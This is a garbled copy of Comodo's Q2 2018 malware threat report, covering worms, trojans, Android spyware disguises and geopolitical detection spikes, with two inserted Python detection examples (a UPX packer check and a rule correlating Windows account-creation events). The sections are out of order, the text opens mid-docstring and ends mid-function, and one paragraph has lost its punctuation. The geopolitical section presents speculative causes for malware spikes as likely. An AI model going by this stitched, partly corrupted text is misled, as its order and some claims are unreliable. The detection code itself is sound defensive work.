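Stock UPX names its sections UPX0/UPX1; a modified build usually renames them,
so the check falls back to a structural sign: an empty first section (the
unpacking target) next to a high-entropy section (the compressed payload).
The PE images below are constructed in-memory test data; offsets follow the
PE/COFF specification."""
import math
import random
import struct

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".UPX0", ".UPX1"}
HIGH_ENTROPY = 7.0  # bits/byte (assumed threshold); compressed or encrypted data is usually > 7


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for empty or constant input, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image):
    """Return [(name, entropy, raw_size)] for each section of a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER (20 bytes)
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)
    table = coff + 20 + opt_size              # section table follows the optional header
    sections = []
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", image, table + 40 * i)
        data = image[raw_ptr:raw_ptr + raw_size]
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         shannon_entropy(data), raw_size))
    return sections


def classify(image):
    """'upx' for stock UPX section names, 'likely-packed' for the renamed
    (modified-UPX style) layout, 'unpacked' otherwise. A heuristic: a packer
    that keeps low-entropy stubs or fills every section will slip past it."""
    sections = parse_sections(image)
    if {name for name, _, _ in sections} & UPX_SECTION_NAMES:
        return "upx"
    has_empty = any(size == 0 for _, _, size in sections)
    has_dense = any(ent > HIGH_ENTROPY for _, ent, _ in sections)
    return "likely-packed" if has_empty and has_dense else "unpacked"


def build_pe(names, blobs):
    """Constructed test data: the smallest PE32 image a section parser accepts
    (DOS header with e_lfanew, PE signature, file header, zeroed optional header,
    one 40-byte section header per blob, raw data 512-byte aligned)."""
    opt_size, e_lfanew = 224, 0x80
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, opt_size, 0x0102)
    raw_ptr = (e_lfanew + 4 + 20 + opt_size + 40 * len(names) + 0x1FF) & ~0x1FF
    table, raw = b"", b""
    for i, (name, blob) in enumerate(zip(names, blobs)):
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(blob), 0x1000 * (i + 1), len(blob),
                             raw_ptr + len(raw), 0, 0, 0, 0, 0x60000020)
        raw += blob
    image = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", image, 0x3C, e_lfanew)
    image += b"PE\0\0" + file_hdr + b"\0" * opt_size + table
    return bytes(image + b"\0" * (raw_ptr - len(image)) + raw)


_rng = random.Random(2018)
COMPRESSED = bytes(_rng.getrandbits(8) for _ in range(4096))  # stands in for UPX output
PLAIN_CODE = b"\x90" * 3072 + b"\xc3" * 1024                  # NOP/RET filler, low entropy
SAMPLES = {
    "stock_upx": build_pe(["UPX0", "UPX1", ".rsrc"], [b"", COMPRESSED, PLAIN_CODE[:512]]),
    "renamed_upx": build_pe([".text", ".data", ".rsrc"], [b"", COMPRESSED, PLAIN_CODE[:512]]),
    "clean": build_pe([".text", ".data"], [PLAIN_CODE, b"\0" * 256]),
}

if __name__ == "__main__":
    for label, image in SAMPLES.items():
        parts = ", ".join(f"{n}:{e:.2f}" for n, e, _ in parse_sections(image))
        print(f"{label:12s} {classify(image):14s} [{parts}]")
```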
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US was far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus products and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware feature set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.16 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1 Adobe Flash Player
Version 2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:
Send_SMS: extract SMS content and send it to the C&C server
Send_USSD: send the USSD to the C&C server
Gethistory: monitor browser history
Start_AllApp: gather info about installed applications
Send_call: set the Intent action to call
Forward_call: forward incoming calls
ResForward_call: reset call forwarding
Go_Smsmnd: delete SMS content
Go_GetAlls: get SMS history
Dell_sms: delete SMS content in a conversation
Send_spam: send spam SMS
Start_Inject: call the injectors class
4.17 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts: get contact details and email id
Mute: set action to mute
Mms: get MMS content
info: get device information
4.18 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.
4.19 Hero Rat
The next digital spook, Hero Rat, mostly operates in Iran. It uses third-party app stores, social networks and messengers to spread.
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you tap this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps listed above, but one of the vectors is especially interesting.
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is this possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that another cybercriminal had earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
[Chart: Android-targeted malware in April (detections; axis ticks 0 to 180,000)]
4.2.2 May 2018
[Chart: Android-targeted malware in May (detections; axis ticks 0 to 500,000)]
4.2.3 June 2018
[Chart: Android-targeted malware in June (detections; axis ticks 0 to 300,000)]
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
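The Starter behavior described above (a new local account that is immediately added to the administrators group) leaves a characteristic pair of Windows Security events: 4720 (user account created) followed within seconds by 4732 (member added to a security-enabled local group). The following is an added example, not code from the report or from Comodo, of a detection rule that correlates those two events by SID within a short window. The event records are constructed samples reduced to the fields the logic needs, and the watchlist of privileged group names is an assumption for illustration.

```python
"""Correlate Windows Security events 4720 (account created) and 4732
(member added to a local group) to flag accounts that are created and
granted local admin rights in quick succession.
Added example; the records below are constructed samples, not real logs."""
from datetime import datetime, timedelta

# Constructed sample events (simplified dict form of the XML EventData fields).
SAMPLE_EVENTS = [
    {"EventID": 4720, "Time": "2018-06-03T02:14:05", "SubjectUserName": "svc_update",
     "TargetUserName": "RemoteSvc", "TargetSid": "S-1-5-21-1111-2222-3333-1105"},
    {"EventID": 4732, "Time": "2018-06-03T02:14:07", "SubjectUserName": "svc_update",
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1111-2222-3333-1105"},
    # A normal help-desk flow: account created, added to RDP users hours later.
    {"EventID": 4720, "Time": "2018-06-03T09:00:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "jsmith", "TargetSid": "S-1-5-21-1111-2222-3333-1106"},
    {"EventID": 4732, "Time": "2018-06-03T11:30:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "Remote Desktop Users", "MemberSid": "S-1-5-21-1111-2222-3333-1106"},
    # A pre-existing account promoted to admin: not this pattern.
    {"EventID": 4732, "Time": "2018-06-04T10:00:00", "SubjectUserName": "itadmin",
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1111-2222-3333-1020"},
]

# Hypothetical watchlist of local groups whose membership is sensitive.
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users"}


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def find_rapid_admin_creations(events, window=timedelta(minutes=10)):
    """Return one finding per account that was created (4720) and then added
    to a privileged local group (4732) within `window`, joined on the SID."""
    created = {e["TargetSid"]: e for e in events if e["EventID"] == 4720}
    findings = []
    for e in events:
        if e["EventID"] != 4732 or e["TargetUserName"] not in PRIVILEGED_GROUPS:
            continue
        birth = created.get(e["MemberSid"])
        if birth is None:
            continue  # account existed before the log window; different rule
        delta = _ts(e["Time"]) - _ts(birth["Time"])
        if timedelta(0) <= delta <= window:
            findings.append({
                "account": birth["TargetUserName"],
                "sid": e["MemberSid"],
                "group": e["TargetUserName"],
                "created_by": birth["SubjectUserName"],
                "seconds_between": int(delta.total_seconds()),
            })
    return findings


if __name__ == "__main__":
    for f in find_rapid_admin_creations(SAMPLE_EVENTS):
        print(f"ALERT: {f['account']} ({f['sid']}) created by {f['created_by']} "
              f"and added to {f['group']} after {f['seconds_between']}s")
```

Joining on the SID rather than the account name avoids a miss when the attacker renames the account between the two events; the window keeps routine provisioning (account today, group tomorrow) out of the alert stream.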
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
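Packed executables, UPX-style ones in particular, can often be recognized statically from the PE section table: the stock UPX section names (UPX0/UPX1), a first section with zero raw data but a large virtual size (the decompressed code is written there at run time), and a section whose bytes are near-random because they are compressed or encrypted. The following is an added example, not code from the report or the UPX project, that parses a PE section table with the standard library and reports those three indicators; the PE image it scans is constructed inline by a small builder, not a real binary, and the section-name list and 7.0 bits-per-byte threshold are assumptions chosen for illustration.

```python
"""Static packer indicators from a PE section table: known packer section
names, an empty section with a large virtual size, and high-entropy content.
Added example; the PE image scanned here is constructed, not a real sample."""
import math
import random
import struct

PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".upx"}  # assumed watchlist


def shannon_entropy(data: bytes) -> float:
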